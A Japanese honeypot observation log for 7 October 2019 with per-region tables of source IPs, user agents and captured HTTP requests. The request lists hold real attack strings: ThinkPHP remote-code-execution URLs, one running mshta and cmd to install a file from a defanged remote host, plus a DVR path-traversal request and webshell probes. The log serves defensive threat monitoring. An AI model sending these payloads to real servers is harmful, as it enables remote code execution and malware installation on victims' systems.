ハニーポット(仮) 観測記録 2019/10/07分です。
特徴
Region:AP
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
他
アクセス数推移
AP:総アクセス数:287 (前日比:+247)
US:総アクセス数:15 (前日比:-114)
EU:総アクセス数:23 (前日比:+4)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 108.189.182.36 | United States |
1 | 114.144.201.34 | Japan |
1 | 118.163.20.215 | Taiwan |
2 | 119.29.132.198 | China |
1 | 125.75.126.222 | China |
1 | 14.29.115.50 | China |
2 | 156.238.3.97 | United States |
1 | 159.203.197.157 | United States |
1 | 159.203.197.175 | United States |
1 | 159.203.201.176 | United States |
1 | 159.203.201.221 | United States |
1 | 162.243.69.215 | United States |
225 | 172.245.135.43 | United States |
2 | 173.229.142.165 | United States |
4 | 180.167.180.242 | China |
2 | 182.254.243.249 | China |
1 | 185.27.60.234 | Hungary |
2 | 201.46.39.42 | Brazil |
2 | 202.181.25.41 | Hong Kong |
2 | 212.112.116.231 | Kyrgyzstan |
2 | 221.215.74.210 | China |
4 | 222.186.130.42 | China |
2 | 222.214.141.110 | China |
2 | 223.244.82.193 | China |
2 | 37.75.10.130 | Turkey |
1 | 42.189.121.170 | Malaysia |
2 | 45.88.6.126 | Hong Kong |
2 | 47.104.253.220 | China |
2 | 49.49.245.244 | Thailand |
1 | 54.36.148.13 | France |
1 | 78.152.196.95 | Ireland |
1 | 79.215.122.14 | Germany |
1 | 80.247.20.209 | United Kingdom |
4 | 82.221.105.7 | Iceland |
1 | 84.54.187.137 | Bulgaria |
1 | 89.148.50.228 | Bahrain |
4 | 93.174.93.178 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
6 | - |
4 | ApiTool |
2 | Go-http-client/1.1 |
6 | Hi |
19 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
3 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/) |
2 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
97 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 |
118 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 |
4 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.10.0 |
2 | python-requests/2.22.0 |
1 | ;s:3:\ |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /shaAdmin/index.php | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
2 | GET | /shell.php | HTTP/1.1 |
1 | GET | /shopdb/index.php | HTTP/1.1 |
9 | GET | /?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP1.jpg%20/Q)\",0)(window.close) | |
1 | GET | /s/index.php | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /spider.php | HTTP/1.1 |
1 | GET | /sqladmin/index.php | HTTP/1.1 |
1 | GET | /sql/index.php | HTTP/1.1 |
1 | GET | /SQL/index.php | HTTP/1.1 |
1 | GET | /t6nv.php | HTTP/1.1 |
1 | GET | /taisui.php | HTTP/1.1 |
2 | GET | /test.php | HTTP/1.1 |
1 | GET | /text.php | HTTP/1.1 |
1 | GET | /tools/phpMyAdmin/index.php | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
4 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /typo3/phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /undx.php | HTTP/1.1 |
1 | GET | /uploader.php | HTTP/1.1 |
1 | GET | /up.php | HTTP/1.1 |
1 | GET | /v/index.php | HTTP/1.1 |
1 | GET | /weathermap/editor.php | HTTP/1.1 |
2 | GET | /webdav/ | HTTP/1.1 |
1 | GET | /web/phpMyAdmin/index.php | HTTP/1.1 |
1 | GET | /websql/index.php | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /woshimengmei.php | HTTP/1.1 |
1 | GET | /wp-config.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php | HTTP/1.1 |
1 | GET | /wpc.php | HTTP/1.1 |
1 | GET | /wpo.php | HTTP/1.1 |
1 | GET | /www/phpMyAdmin/index.php | HTTP/1.1 |
1 | GET | /WWW/phpMyAdmin/index.php | HTTP/1.1 |
1 | GET | /xampp/phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /xiaoxia.php | HTTP/1.1 |
1 | GET | /xiaxia.php | HTTP/1.1 |
1 | GET | /xiu.php | HTTP/1.1 |
1 | GET | /x.php | HTTP/1.1 |
1 | GET | /xsser.php | HTTP/1.1 |
1 | GET | /yu.php | HTTP/1.1 |
1 | GET | /yuyang.php | HTTP/1.1 |
1 | GET | /z.php | HTTP/1.1 |
1 | GET | /zz.php | HTTP/1.1 |
1 | GET | /zzz.php | HTTP/1.1 |
1 | POST | /%75%73%65%72%2e%70%68%70 | HTTP/1.1 |
4 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /function.inc.php | HTTP/1.1 |
1 | POST | /sample.php | HTTP/1.1 |
2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | PROPFIND | / | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 113.160.47.142 | Vietnam |
1 | 118.101.163.78 | Malaysia |
1 | 159.203.201.119 | United States |
1 | 159.203.201.242 | United States |
1 | 178.54.86.119 | Ukraine |
1 | 185.84.174.225 | Russia |
2 | 222.163.45.160 | China |
1 | 27.50.132.171 | China |
1 | 34.76.33.39 | United States |
1 | 42.188.206.106 | Malaysia |
1 | 45.66.104.110 | Hungary |
1 | 58.255.36.101 | China |
1 | 64.72.87.182 | United States |
1 | 93.174.93.178 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
1 | - |
1 | ApiTool |
3 | Hi |
5 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /auth1.html | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
3 | GET | /Pages/login.htm | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
5 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 104.222.32.244 | United States |
10 | 106.13.99.175 | China |
2 | 113.96.223.207 | China |
1 | 115.231.91.7 | China |
1 | 154.81.196.62 | Seychelles |
1 | 27.124.47.10 | Hong Kong |
1 | 39.98.65.104 | China |
1 | 61.219.11.153 | Taiwan |
1 | 68.183.188.21 | United States |
2 | 77.247.110.31 | Netherlands |
1 | 85.209.42.138 | United States |
1 | 93.174.93.178 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
1 | ApiTool |
2 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 |
1 | Go-http-client/1.1 |
5 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
1 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | CONNECT | xui.ptlogin2.qq.com:443 | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /getip | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
5 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /VSR3/extjs/ext-all-js/ext.axd?v=21133 | HTTP/1.1 |
1 | GET | /VSR3/Forms/Login/Login.aspx | HTTP/1.1 |
1 | OPTION | / | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |